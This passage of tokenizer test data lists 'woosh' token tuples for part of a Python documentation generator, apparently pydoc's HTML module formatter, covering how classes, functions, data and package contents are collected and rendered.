woosh.Token(woosh.NAME, 'if', 782, 16, 782, 18),
woosh.Token(woosh.NAME, 'visiblename', 782, 19, 782, 30),
woosh.Token(woosh.OP, '(', 782, 30, 782, 31),
woosh.Token(woosh.NAME, 'key', 782, 31, 782, 34),
woosh.Token(woosh.OP, ',', 782, 34, 782, 35),
woosh.Token(woosh.NAME, 'all', 782, 36, 782, 39),
woosh.Token(woosh.OP, ',', 782, 39, 782, 40),
woosh.Token(woosh.NAME, 'object', 782, 41, 782, 47),
woosh.Token(woosh.OP, ')', 782, 47, 782, 48),
woosh.Token(woosh.OP, ':', 782, 48, 782, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 782, 49, 783, 0),
woosh.Token(woosh.INDENT, ' ', 783, 0, 783, 20),
woosh.Token(woosh.NAME, 'classes', 783, 20, 783, 27),
woosh.Token(woosh.OP, '.', 783, 27, 783, 28),
woosh.Token(woosh.NAME, 'append', 783, 28, 783, 34),
woosh.Token(woosh.OP, '(', 783, 34, 783, 35),
woosh.Token(woosh.OP, '(', 783, 35, 783, 36),
woosh.Token(woosh.NAME, 'key', 783, 36, 783, 39),
woosh.Token(woosh.OP, ',', 783, 39, 783, 40),
woosh.Token(woosh.NAME, 'value', 783, 41, 783, 46),
woosh.Token(woosh.OP, ')', 783, 46, 783, 47),
woosh.Token(woosh.OP, ')', 783, 47, 783, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 783, 48, 784, 0),
woosh.Token(woosh.NAME, 'cdict', 784, 20, 784, 25),
woosh.Token(woosh.OP, '[', 784, 25, 784, 26),
woosh.Token(woosh.NAME, 'key', 784, 26, 784, 29),
woosh.Token(woosh.OP, ']', 784, 29, 784, 30),
woosh.Token(woosh.OP, '=', 784, 31, 784, 32),
woosh.Token(woosh.NAME, 'cdict', 784, 33, 784, 38),
woosh.Token(woosh.OP, '[', 784, 38, 784, 39),
woosh.Token(woosh.NAME, 'value', 784, 39, 784, 44),
woosh.Token(woosh.OP, ']', 784, 44, 784, 45),
woosh.Token(woosh.OP, '=', 784, 46, 784, 47),
woosh.Token(woosh.STRING, "'#'", 784, 48, 784, 51),
woosh.Token(woosh.OP, '+', 784, 52, 784, 53),
woosh.Token(woosh.NAME, 'key', 784, 54, 784, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 784, 57, 785, 0),
woosh.Token(woosh.DEDENT, ' ', 785, 0, 785, 8),
woosh.Token(woosh.DEDENT, '', 785, 8, 785, 8),
woosh.Token(woosh.DEDENT, '', 785, 8, 785, 8),
woosh.Token(woosh.NAME, 'for', 785, 8, 785, 11),
woosh.Token(woosh.NAME, 'key', 785, 12, 785, 15),
woosh.Token(woosh.OP, ',', 785, 15, 785, 16),
woosh.Token(woosh.NAME, 'value', 785, 17, 785, 22),
woosh.Token(woosh.NAME, 'in', 785, 23, 785, 25),
woosh.Token(woosh.NAME, 'classes', 785, 26, 785, 33),
woosh.Token(woosh.OP, ':', 785, 33, 785, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 785, 34, 786, 0),
woosh.Token(woosh.INDENT, ' ', 786, 0, 786, 12),
woosh.Token(woosh.NAME, 'for', 786, 12, 786, 15),
woosh.Token(woosh.NAME, 'base', 786, 16, 786, 20),
woosh.Token(woosh.NAME, 'in', 786, 21, 786, 23),
woosh.Token(woosh.NAME, 'value', 786, 24, 786, 29),
woosh.Token(woosh.OP, '.', 786, 29, 786, 30),
woosh.Token(woosh.NAME, '__bases__', 786, 30, 786, 39),
woosh.Token(woosh.OP, ':', 786, 39, 786, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 786, 40, 787, 0),
woosh.Token(woosh.INDENT, ' ', 787, 0, 787, 16),
woosh.Token(woosh.NAME, 'key', 787, 16, 787, 19),
woosh.Token(woosh.OP, ',', 787, 19, 787, 20),
woosh.Token(woosh.NAME, 'modname', 787, 21, 787, 28),
woosh.Token(woosh.OP, '=', 787, 29, 787, 30),
woosh.Token(woosh.NAME, 'base', 787, 31, 787, 35),
woosh.Token(woosh.OP, '.', 787, 35, 787, 36),
woosh.Token(woosh.NAME, '__name__', 787, 36, 787, 44),
woosh.Token(woosh.OP, ',', 787, 44, 787, 45),
woosh.Token(woosh.NAME, 'base', 787, 46, 787, 50),
woosh.Token(woosh.OP, '.', 787, 50, 787, 51),
woosh.Token(woosh.NAME, '__module__', 787, 51, 787, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 787, 61, 788, 0),
woosh.Token(woosh.NAME, 'module', 788, 16, 788, 22),
woosh.Token(woosh.OP, '=', 788, 23, 788, 24),
woosh.Token(woosh.NAME, 'sys', 788, 25, 788, 28),
woosh.Token(woosh.OP, '.', 788, 28, 788, 29),
woosh.Token(woosh.NAME, 'modules', 788, 29, 788, 36),
woosh.Token(woosh.OP, '.', 788, 36, 788, 37),
woosh.Token(woosh.NAME, 'get', 788, 37, 788, 40),
woosh.Token(woosh.OP, '(', 788, 40, 788, 41),
woosh.Token(woosh.NAME, 'modname', 788, 41, 788, 48),
woosh.Token(woosh.OP, ')', 788, 48, 788, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 788, 49, 789, 0),
woosh.Token(woosh.NAME, 'if', 789, 16, 789, 18),
woosh.Token(woosh.NAME, 'modname', 789, 19, 789, 26),
woosh.Token(woosh.OP, '!=', 789, 27, 789, 29),
woosh.Token(woosh.NAME, 'name', 789, 30, 789, 34),
woosh.Token(woosh.NAME, 'and', 789, 35, 789, 38),
woosh.Token(woosh.NAME, 'module', 789, 39, 789, 45),
woosh.Token(woosh.NAME, 'and', 789, 46, 789, 49),
woosh.Token(woosh.NAME, 'hasattr', 789, 50, 789, 57),
woosh.Token(woosh.OP, '(', 789, 57, 789, 58),
woosh.Token(woosh.NAME, 'module', 789, 58, 789, 64),
woosh.Token(woosh.OP, ',', 789, 64, 789, 65),
woosh.Token(woosh.NAME, 'key', 789, 66, 789, 69),
woosh.Token(woosh.OP, ')', 789, 69, 789, 70),
woosh.Token(woosh.OP, ':', 789, 70, 789, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 789, 71, 790, 0),
woosh.Token(woosh.INDENT, ' ', 790, 0, 790, 20),
woosh.Token(woosh.NAME, 'if', 790, 20, 790, 22),
woosh.Token(woosh.NAME, 'getattr', 790, 23, 790, 30),
woosh.Token(woosh.OP, '(', 790, 30, 790, 31),
woosh.Token(woosh.NAME, 'module', 790, 31, 790, 37),
woosh.Token(woosh.OP, ',', 790, 37, 790, 38),
woosh.Token(woosh.NAME, 'key', 790, 39, 790, 42),
woosh.Token(woosh.OP, ')', 790, 42, 790, 43),
woosh.Token(woosh.NAME, 'is', 790, 44, 790, 46),
woosh.Token(woosh.NAME, 'base', 790, 47, 790, 51),
woosh.Token(woosh.OP, ':', 790, 51, 790, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 790, 52, 791, 0),
woosh.Token(woosh.INDENT, ' ', 791, 0, 791, 24),
woosh.Token(woosh.NAME, 'if', 791, 24, 791, 26),
woosh.Token(woosh.NAME, 'not', 791, 27, 791, 30),
woosh.Token(woosh.NAME, 'key', 791, 31, 791, 34),
woosh.Token(woosh.NAME, 'in', 791, 35, 791, 37),
woosh.Token(woosh.NAME, 'cdict', 791, 38, 791, 43),
woosh.Token(woosh.OP, ':', 791, 43, 791, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 791, 44, 792, 0),
woosh.Token(woosh.INDENT, ' ', 792, 0, 792, 28),
woosh.Token(woosh.NAME, 'cdict', 792, 28, 792, 33),
woosh.Token(woosh.OP, '[', 792, 33, 792, 34),
woosh.Token(woosh.NAME, 'key', 792, 34, 792, 37),
woosh.Token(woosh.OP, ']', 792, 37, 792, 38),
woosh.Token(woosh.OP, '=', 792, 39, 792, 40),
woosh.Token(woosh.NAME, 'cdict', 792, 41, 792, 46),
woosh.Token(woosh.OP, '[', 792, 46, 792, 47),
woosh.Token(woosh.NAME, 'base', 792, 47, 792, 51),
woosh.Token(woosh.OP, ']', 792, 51, 792, 52),
woosh.Token(woosh.OP, '=', 792, 53, 792, 54),
woosh.Token(woosh.NAME, 'modname', 792, 55, 792, 62),
woosh.Token(woosh.OP, '+', 792, 63, 792, 64),
woosh.Token(woosh.STRING, "'.html#'", 792, 65, 792, 73),
woosh.Token(woosh.OP, '+', 792, 74, 792, 75),
woosh.Token(woosh.NAME, 'key', 792, 76, 792, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 792, 79, 793, 0),
woosh.Token(woosh.DEDENT, ' ', 793, 0, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.NAME, 'funcs', 793, 8, 793, 13),
woosh.Token(woosh.OP, ',', 793, 13, 793, 14),
woosh.Token(woosh.NAME, 'fdict', 793, 15, 793, 20),
woosh.Token(woosh.OP, '=', 793, 21, 793, 22),
woosh.Token(woosh.OP, '[', 793, 23, 793, 24),
woosh.Token(woosh.OP, ']', 793, 24, 793, 25),
woosh.Token(woosh.OP, ',', 793, 25, 793, 26),
woosh.Token(woosh.OP, '{', 793, 27, 793, 28),
woosh.Token(woosh.OP, '}', 793, 28, 793, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 793, 29, 794, 0),
woosh.Token(woosh.NAME, 'for', 794, 8, 794, 11),
woosh.Token(woosh.NAME, 'key', 794, 12, 794, 15),
woosh.Token(woosh.OP, ',', 794, 15, 794, 16),
woosh.Token(woosh.NAME, 'value', 794, 17, 794, 22),
woosh.Token(woosh.NAME, 'in', 794, 23, 794, 25),
woosh.Token(woosh.NAME, 'inspect', 794, 26, 794, 33),
woosh.Token(woosh.OP, '.', 794, 33, 794, 34),
woosh.Token(woosh.NAME, 'getmembers', 794, 34, 794, 44),
woosh.Token(woosh.OP, '(', 794, 44, 794, 45),
woosh.Token(woosh.NAME, 'object', 794, 45, 794, 51),
woosh.Token(woosh.OP, ',', 794, 51, 794, 52),
woosh.Token(woosh.NAME, 'inspect', 794, 53, 794, 60),
woosh.Token(woosh.OP, '.', 794, 60, 794, 61),
woosh.Token(woosh.NAME, 'isroutine', 794, 61, 794, 70),
woosh.Token(woosh.OP, ')', 794, 70, 794, 71),
woosh.Token(woosh.OP, ':', 794, 71, 794, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 794, 72, 795, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 795, 12, 795, 74),
woosh.Token(woosh.INDENT, ' ', 796, 0, 796, 12),
woosh.Token(woosh.NAME, 'if', 796, 12, 796, 14),
woosh.Token(woosh.OP, '(', 796, 15, 796, 16),
woosh.Token(woosh.NAME, 'all', 796, 16, 796, 19),
woosh.Token(woosh.NAME, 'is', 796, 20, 796, 22),
woosh.Token(woosh.NAME, 'not', 796, 23, 796, 26),
woosh.Token(woosh.NAME, 'None', 796, 27, 796, 31),
woosh.Token(woosh.NAME, 'or', 796, 32, 796, 34),
woosh.Token(woosh.NAME, 'inspect', 797, 16, 797, 23),
woosh.Token(woosh.OP, '.', 797, 23, 797, 24),
woosh.Token(woosh.NAME, 'isbuiltin', 797, 24, 797, 33),
woosh.Token(woosh.OP, '(', 797, 33, 797, 34),
woosh.Token(woosh.NAME, 'value', 797, 34, 797, 39),
woosh.Token(woosh.OP, ')', 797, 39, 797, 40),
woosh.Token(woosh.NAME, 'or', 797, 41, 797, 43),
woosh.Token(woosh.NAME, 'inspect', 797, 44, 797, 51),
woosh.Token(woosh.OP, '.', 797, 51, 797, 52),
woosh.Token(woosh.NAME, 'getmodule', 797, 52, 797, 61),
woosh.Token(woosh.OP, '(', 797, 61, 797, 62),
woosh.Token(woosh.NAME, 'value', 797, 62, 797, 67),
woosh.Token(woosh.OP, ')', 797, 67, 797, 68),
woosh.Token(woosh.NAME, 'is', 797, 69, 797, 71),
woosh.Token(woosh.NAME, 'object', 797, 72, 797, 78),
woosh.Token(woosh.OP, ')', 797, 78, 797, 79),
woosh.Token(woosh.OP, ':', 797, 79, 797, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 797, 80, 798, 0),
woosh.Token(woosh.INDENT, ' ', 798, 0, 798, 16),
woosh.Token(woosh.NAME, 'if', 798, 16, 798, 18),
woosh.Token(woosh.NAME, 'visiblename', 798, 19, 798, 30),
woosh.Token(woosh.OP, '(', 798, 30, 798, 31),
woosh.Token(woosh.NAME, 'key', 798, 31, 798, 34),
woosh.Token(woosh.OP, ',', 798, 34, 798, 35),
woosh.Token(woosh.NAME, 'all', 798, 36, 798, 39),
woosh.Token(woosh.OP, ',', 798, 39, 798, 40),
woosh.Token(woosh.NAME, 'object', 798, 41, 798, 47),
woosh.Token(woosh.OP, ')', 798, 47, 798, 48),
woosh.Token(woosh.OP, ':', 798, 48, 798, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 798, 49, 799, 0),
woosh.Token(woosh.INDENT, ' ', 799, 0, 799, 20),
woosh.Token(woosh.NAME, 'funcs', 799, 20, 799, 25),
woosh.Token(woosh.OP, '.', 799, 25, 799, 26),
woosh.Token(woosh.NAME, 'append', 799, 26, 799, 32),
woosh.Token(woosh.OP, '(', 799, 32, 799, 33),
woosh.Token(woosh.OP, '(', 799, 33, 799, 34),
woosh.Token(woosh.NAME, 'key', 799, 34, 799, 37),
woosh.Token(woosh.OP, ',', 799, 37, 799, 38),
woosh.Token(woosh.NAME, 'value', 799, 39, 799, 44),
woosh.Token(woosh.OP, ')', 799, 44, 799, 45),
woosh.Token(woosh.OP, ')', 799, 45, 799, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 799, 46, 800, 0),
woosh.Token(woosh.NAME, 'fdict', 800, 20, 800, 25),
woosh.Token(woosh.OP, '[', 800, 25, 800, 26),
woosh.Token(woosh.NAME, 'key', 800, 26, 800, 29),
woosh.Token(woosh.OP, ']', 800, 29, 800, 30),
woosh.Token(woosh.OP, '=', 800, 31, 800, 32),
woosh.Token(woosh.STRING, "'#-'", 800, 33, 800, 37),
woosh.Token(woosh.OP, '+', 800, 38, 800, 39),
woosh.Token(woosh.NAME, 'key', 800, 40, 800, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 800, 43, 801, 0),
woosh.Token(woosh.NAME, 'if', 801, 20, 801, 22),
woosh.Token(woosh.NAME, 'inspect', 801, 23, 801, 30),
woosh.Token(woosh.OP, '.', 801, 30, 801, 31),
woosh.Token(woosh.NAME, 'isfunction', 801, 31, 801, 41),
woosh.Token(woosh.OP, '(', 801, 41, 801, 42),
woosh.Token(woosh.NAME, 'value', 801, 42, 801, 47),
woosh.Token(woosh.OP, ')', 801, 47, 801, 48),
woosh.Token(woosh.OP, ':', 801, 48, 801, 49),
woosh.Token(woosh.NAME, 'fdict', 801, 50, 801, 55),
woosh.Token(woosh.OP, '[', 801, 55, 801, 56),
woosh.Token(woosh.NAME, 'value', 801, 56, 801, 61),
woosh.Token(woosh.OP, ']', 801, 61, 801, 62),
woosh.Token(woosh.OP, '=', 801, 63, 801, 64),
woosh.Token(woosh.NAME, 'fdict', 801, 65, 801, 70),
woosh.Token(woosh.OP, '[', 801, 70, 801, 71),
woosh.Token(woosh.NAME, 'key', 801, 71, 801, 74),
woosh.Token(woosh.OP, ']', 801, 74, 801, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 801, 75, 802, 0),
woosh.Token(woosh.DEDENT, ' ', 802, 0, 802, 8),
woosh.Token(woosh.DEDENT, '', 802, 8, 802, 8),
woosh.Token(woosh.DEDENT, '', 802, 8, 802, 8),
woosh.Token(woosh.NAME, 'data', 802, 8, 802, 12),
woosh.Token(woosh.OP, '=', 802, 13, 802, 14),
woosh.Token(woosh.OP, '[', 802, 15, 802, 16),
woosh.Token(woosh.OP, ']', 802, 16, 802, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 802, 17, 803, 0),
woosh.Token(woosh.NAME, 'for', 803, 8, 803, 11),
woosh.Token(woosh.NAME, 'key', 803, 12, 803, 15),
woosh.Token(woosh.OP, ',', 803, 15, 803, 16),
woosh.Token(woosh.NAME, 'value', 803, 17, 803, 22),
woosh.Token(woosh.NAME, 'in', 803, 23, 803, 25),
woosh.Token(woosh.NAME, 'inspect', 803, 26, 803, 33),
woosh.Token(woosh.OP, '.', 803, 33, 803, 34),
woosh.Token(woosh.NAME, 'getmembers', 803, 34, 803, 44),
woosh.Token(woosh.OP, '(', 803, 44, 803, 45),
woosh.Token(woosh.NAME, 'object', 803, 45, 803, 51),
woosh.Token(woosh.OP, ',', 803, 51, 803, 52),
woosh.Token(woosh.NAME, 'isdata', 803, 53, 803, 59),
woosh.Token(woosh.OP, ')', 803, 59, 803, 60),
woosh.Token(woosh.OP, ':', 803, 60, 803, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 803, 61, 804, 0),
woosh.Token(woosh.INDENT, ' ', 804, 0, 804, 12),
woosh.Token(woosh.NAME, 'if', 804, 12, 804, 14),
woosh.Token(woosh.NAME, 'visiblename', 804, 15, 804, 26),
woosh.Token(woosh.OP, '(', 804, 26, 804, 27),
woosh.Token(woosh.NAME, 'key', 804, 27, 804, 30),
woosh.Token(woosh.OP, ',', 804, 30, 804, 31),
woosh.Token(woosh.NAME, 'all', 804, 32, 804, 35),
woosh.Token(woosh.OP, ',', 804, 35, 804, 36),
woosh.Token(woosh.NAME, 'object', 804, 37, 804, 43),
woosh.Token(woosh.OP, ')', 804, 43, 804, 44),
woosh.Token(woosh.OP, ':', 804, 44, 804, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 804, 45, 805, 0),
woosh.Token(woosh.INDENT, ' ', 805, 0, 805, 16),
woosh.Token(woosh.NAME, 'data', 805, 16, 805, 20),
woosh.Token(woosh.OP, '.', 805, 20, 805, 21),
woosh.Token(woosh.NAME, 'append', 805, 21, 805, 27),
woosh.Token(woosh.OP, '(', 805, 27, 805, 28),
woosh.Token(woosh.OP, '(', 805, 28, 805, 29),
woosh.Token(woosh.NAME, 'key', 805, 29, 805, 32),
woosh.Token(woosh.OP, ',', 805, 32, 805, 33),
woosh.Token(woosh.NAME, 'value', 805, 34, 805, 39),
woosh.Token(woosh.OP, ')', 805, 39, 805, 40),
woosh.Token(woosh.OP, ')', 805, 40, 805, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 805, 41, 806, 0),
woosh.Token(woosh.DEDENT, ' ', 807, 0, 807, 8),
woosh.Token(woosh.DEDENT, '', 807, 8, 807, 8),
woosh.Token(woosh.NAME, 'doc', 807, 8, 807, 11),
woosh.Token(woosh.OP, '=', 807, 12, 807, 13),
woosh.Token(woosh.NAME, 'self', 807, 14, 807, 18),
woosh.Token(woosh.OP, '.', 807, 18, 807, 19),
woosh.Token(woosh.NAME, 'markup', 807, 19, 807, 25),
woosh.Token(woosh.OP, '(', 807, 25, 807, 26),
woosh.Token(woosh.NAME, 'getdoc', 807, 26, 807, 32),
woosh.Token(woosh.OP, '(', 807, 32, 807, 33),
woosh.Token(woosh.NAME, 'object', 807, 33, 807, 39),
woosh.Token(woosh.OP, ')', 807, 39, 807, 40),
woosh.Token(woosh.OP, ',', 807, 40, 807, 41),
woosh.Token(woosh.NAME, 'self', 807, 42, 807, 46),
woosh.Token(woosh.OP, '.', 807, 46, 807, 47),
woosh.Token(woosh.NAME, 'preformat', 807, 47, 807, 56),
woosh.Token(woosh.OP, ',', 807, 56, 807, 57),
woosh.Token(woosh.NAME, 'fdict', 807, 58, 807, 63),
woosh.Token(woosh.OP, ',', 807, 63, 807, 64),
woosh.Token(woosh.NAME, 'cdict', 807, 65, 807, 70),
woosh.Token(woosh.OP, ')', 807, 70, 807, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 807, 71, 808, 0),
woosh.Token(woosh.NAME, 'doc', 808, 8, 808, 11),
woosh.Token(woosh.OP, '=', 808, 12, 808, 13),
woosh.Token(woosh.NAME, 'doc', 808, 14, 808, 17),
woosh.Token(woosh.NAME, 'and', 808, 18, 808, 21),
woosh.Token(woosh.STRING, "'<tt>%s</tt>'", 808, 22, 808, 35),
woosh.Token(woosh.OP, '%', 808, 36, 808, 37),
woosh.Token(woosh.NAME, 'doc', 808, 38, 808, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 808, 41, 809, 0),
woosh.Token(woosh.NAME, 'result', 809, 8, 809, 14),
woosh.Token(woosh.OP, '=', 809, 15, 809, 16),
woosh.Token(woosh.NAME, 'result', 809, 17, 809, 23),
woosh.Token(woosh.OP, '+', 809, 24, 809, 25),
woosh.Token(woosh.STRING, "'<p>%s</p>\\n'", 809, 26, 809, 39),
woosh.Token(woosh.OP, '%', 809, 40, 809, 41),
woosh.Token(woosh.NAME, 'doc', 809, 42, 809, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 809, 45, 810, 0),
woosh.Token(woosh.NAME, 'if', 811, 8, 811, 10),
woosh.Token(woosh.NAME, 'hasattr', 811, 11, 811, 18),
woosh.Token(woosh.OP, '(', 811, 18, 811, 19),
woosh.Token(woosh.NAME, 'object', 811, 19, 811, 25),
woosh.Token(woosh.OP, ',', 811, 25, 811, 26),
woosh.Token(woosh.STRING, "'__path__'", 811, 27, 811, 37),
woosh.Token(woosh.OP, ')', 811, 37, 811, 38),
woosh.Token(woosh.OP, ':', 811, 38, 811, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 811, 39, 812, 0),
woosh.Token(woosh.INDENT, ' ', 812, 0, 812, 12),
woosh.Token(woosh.NAME, 'modpkgs', 812, 12, 812, 19),
woosh.Token(woosh.OP, '=', 812, 20, 812, 21),
woosh.Token(woosh.OP, '[', 812, 22, 812, 23),
woosh.Token(woosh.OP, ']', 812, 23, 812, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 812, 24, 813, 0),
woosh.Token(woosh.NAME, 'for', 813, 12, 813, 15),
woosh.Token(woosh.NAME, 'importer', 813, 16, 813, 24),
woosh.Token(woosh.OP, ',', 813, 24, 813, 25),
woosh.Token(woosh.NAME, 'modname', 813, 26, 813, 33),
woosh.Token(woosh.OP, ',', 813, 33, 813, 34),
woosh.Token(woosh.NAME, 'ispkg', 813, 35, 813, 40),
woosh.Token(woosh.NAME, 'in', 813, 41, 813, 43),
woosh.Token(woosh.NAME, 'pkgutil', 813, 44, 813, 51),
woosh.Token(woosh.OP, '.', 813, 51, 813, 52),
woosh.Token(woosh.NAME, 'iter_modules', 813, 52, 813, 64),
woosh.Token(woosh.OP, '(', 813, 64, 813, 65),
woosh.Token(woosh.NAME, 'object', 813, 65, 813, 71),
woosh.Token(woosh.OP, '.', 813, 71, 813, 72),
woosh.Token(woosh.NAME, '__path__', 813, 72, 813, 80),
woosh.Token(woosh.OP, ')', 813, 80, 813, 81),
woosh.Token(woosh.OP, ':', 813, 81, 813, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 813, 82, 814, 0),
woosh.Token(woosh.INDENT, ' ', 814, 0, 814, 16),
woosh.Token(woosh.NAME, 'modpkgs', 814, 16, 814, 23),
woosh.Token(woosh.OP, '.', 814, 23, 814, 24),
woosh.Token(woosh.NAME, 'append', 814, 24, 814, 30),
woosh.Token(woosh.OP, '(', 814, 30, 814, 31),
woosh.Token(woosh.OP, '(', 814, 31, 814, 32),
woosh.Token(woosh.NAME, 'modname', 814, 32, 814, 39),
woosh.Token(woosh.OP, ',', 814, 39, 814, 40),
woosh.Token(woosh.NAME, 'name', 814, 41, 814, 45),
woosh.Token(woosh.OP, ',', 814, 45, 814, 46),
woosh.Token(woosh.NAME, 'ispkg', 814, 47, 814, 52),
woosh.Token(woosh.OP, ',', 814, 52, 814, 53),
woosh.Token(woosh.NUMBER, '0', 814, 54, 814, 55),
woosh.Token(woosh.OP, ')', 814, 55, 814, 56),
woosh.Token(woosh.OP, ')', 814, 56, 814, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 814, 57, 815, 0),
woosh.Token(woosh.DEDENT, ' ', 815, 0, 815, 12),
woosh.Token(woosh.NAME, 'modpkgs', 815, 12, 815, 19),
woosh.Token(woosh.OP, '.', 815, 19, 815, 20),
woosh.Token(woosh.NAME, 'sort', 815, 20, 815, 24),
woosh.Token(woosh.OP, '(', 815, 24, 815, 25),
woosh.Token(woosh.OP, ')', 815, 25, 815, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 815, 26, 816, 0),
woosh.Token(woosh.NAME, 'contents', 816, 12, 816, 20),
woosh.Token(woosh.OP, '=', 816, 21, 816, 22),
woosh.Token(woosh.NAME, 'self', 816, 23, 816, 27),
woosh.Token(woosh.OP, '.', 816, 27, 816, 28),
woosh.Token(woosh.NAME, 'multicolumn', 816, 28, 816, 39),
woosh.Token(woosh.OP, '(', 816, 39, 816, 40),
woosh.Token(woosh.NAME, 'modpkgs', 816, 40, 816, 47),
woosh.Token(woosh.OP, ',', 816, 47, 816, 48),
woosh.Token(woosh.NAME, 'self', 816, 49, 816, 53),
woosh.Token(woosh.OP, '.', 816, 53, 816, 54),
woosh.Token(woosh.NAME, 'modpkglink', 816, 54, 816, 64),
woosh.Token(woosh.OP, ')', 816, 64, 816, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 816, 65, 817, 0),
woosh.Token(woosh.NAME, 'result', 817, 12, 817, 18),
woosh.Token(woosh.OP, '=', 817, 19, 817, 20),
woosh.Token(woosh.NAME, 'result', 817, 21, 817, 27),
woosh.Token(woosh.OP, '+', 817, 28, 817, 29),
woosh.Token(woosh.NAME, 'self', 817, 30, 817, 34),
woosh.Token(woosh.OP, '.', 817, 34, 817, 35),
woosh.Token(woosh.NAME, 'bigsection', 817, 35, 817, 45),
woosh.Token(woosh.OP, '(', 817, 45, 817, 46),
woosh.Token(woosh.STRING, "'Package Contents'", 818, 16, 818, 34),
woosh.Token(woosh.OP, ',', 818, 34, 818, 35),
woosh.Token(woosh.STRING, "'#ffffff'", 818, 36, 818, 45),
woosh.Token(woosh.OP, ',', 818, 45, 818, 46),
woosh.Token(woosh.STRING, "'#aa55cc'", 818, 47, 818, 56),
woosh.Token(woosh.OP, ',', 818, 56, 818, 57),
woosh.Token(woosh.NAME, 'contents', 818, 58, 818, 66),
woosh.Token(woosh.OP, ')', 818, 66, 818, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 818, 67, 819, 0),
woosh.Token(woosh.DEDENT, ' ', 819, 0, 819, 8),
woosh.Token(woosh.NAME, 'elif', 819, 8, 819, 12),
woosh.Token(woosh.NAME, 'modules', 819, 13, 819, 20),
woosh.Token(woosh.OP, ':', 819, 20, 819, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 819, 21, 820, 0),
woosh.Token(woosh.INDENT, ' ', 820, 0, 820, 12),
woosh.Token(woosh.NAME, 'contents', 820, 12, 820, 20),
woosh.Token(woosh.OP, '=', 820, 21, 820, 22),
woosh.Token(woosh.NAME, 'self', 820, 23, 820, 27),
woosh.Token(woosh.OP, '.', 820, 27, 820, 28),
woosh.Token(woosh.NAME, 'multicolumn', 820, 28, 820, 39),
woosh.Token(woosh.OP, '(', 820, 39, 820, 40),
woosh.Token(woosh.NAME, 'modules', 821, 16, 821, 23),
woosh.Token(woosh.OP, ',', 821, 23, 821, 24),
woosh.Token(woosh.NAME, 'lambda', 821, 25, 821, 31),
woosh.Token(woosh.NAME, 't', 821, 32, 821, 33),
woosh.Token(woosh.OP, ':', 821, 33, 821, 34),
woosh.Token(woosh.NAME, 'self', 821, 35, 821, 39),
woosh.Token(woosh.OP, '.', 821, 39, 821, 40),
woosh.Token(woosh.NAME, 'modulelink', 821, 40, 821, 50),
woosh.Token(woosh.OP, '(', 821, 50, 821, 51),
woosh.Token(woosh.NAME, 't', 821, 51, 821, 52),
woosh.Token(woosh.OP, '[', 821, 52, 821, 53),
woosh.Token(woosh.NUMBER, '1', 821, 53, 821, 54),
woosh.Token(woosh.OP, ']', 821, 54, 821, 55),
woosh.Token(woosh.OP, ')', 821, 55, 821, 56),
woosh.Token(woosh.OP, ')', 821, 56, 821, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 821, 57, 822, 0),
woosh.Token(woosh.NAME, 'result', 822, 12, 822, 18),
woosh.Token(woosh.OP, '=', 822, 19, 822, 20),
woosh.Token(woosh.NAME, 'result', 822, 21, 822, 27),
woosh.Token(woosh.OP, '+', 822, 28, 822, 29),
woosh.Token(woosh.NAME, 'self', 822, 30, 822, 34),
woosh.Token(woosh.OP, '.', 822, 34, 822, 35),
woosh.Token(woosh.NAME, 'bigsection', 822, 35, 822, 45),
woosh.Token(woosh.OP, '(', 822, 45, 822, 46),
woosh.Token(woosh.STRING, "'Modules'", 823, 16, 823, 25),
woosh.Token(woosh.OP, ',', 823, 25, 823, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 823, 27, 823, 36),
woosh.Token(woosh.OP, ',', 823, 36, 823, 37),
woosh.Token(woosh.STRING, "'#aa55cc'", 823, 38, 823, 47),
woosh.Token(woosh.OP, ',', 823, 47, 823, 48),
woosh.Token(woosh.NAME, 'contents', 823, 49, 823, 57),
woosh.Token(woosh.OP, ')', 823, 57, 823, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 823, 58, 824, 0),
woosh.Token(woosh.DEDENT, ' ', 825, 0, 825, 8),
woosh.Token(woosh.NAME, 'if', 825, 8, 825, 10),
woosh.Token(woosh.NAME, 'classes', 825, 11, 825, 18),
woosh.Token(woosh.OP, ':', 825, 18, 825, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 825, 19, 826, 0),
woosh.Token(woosh.INDENT, ' ', 826, 0, 826, 12),
woosh.Token(woosh.NAME, 'classlist', 826, 12, 826, 21),
woosh.Token(woosh.OP, '=', 826, 22, 826, 23),
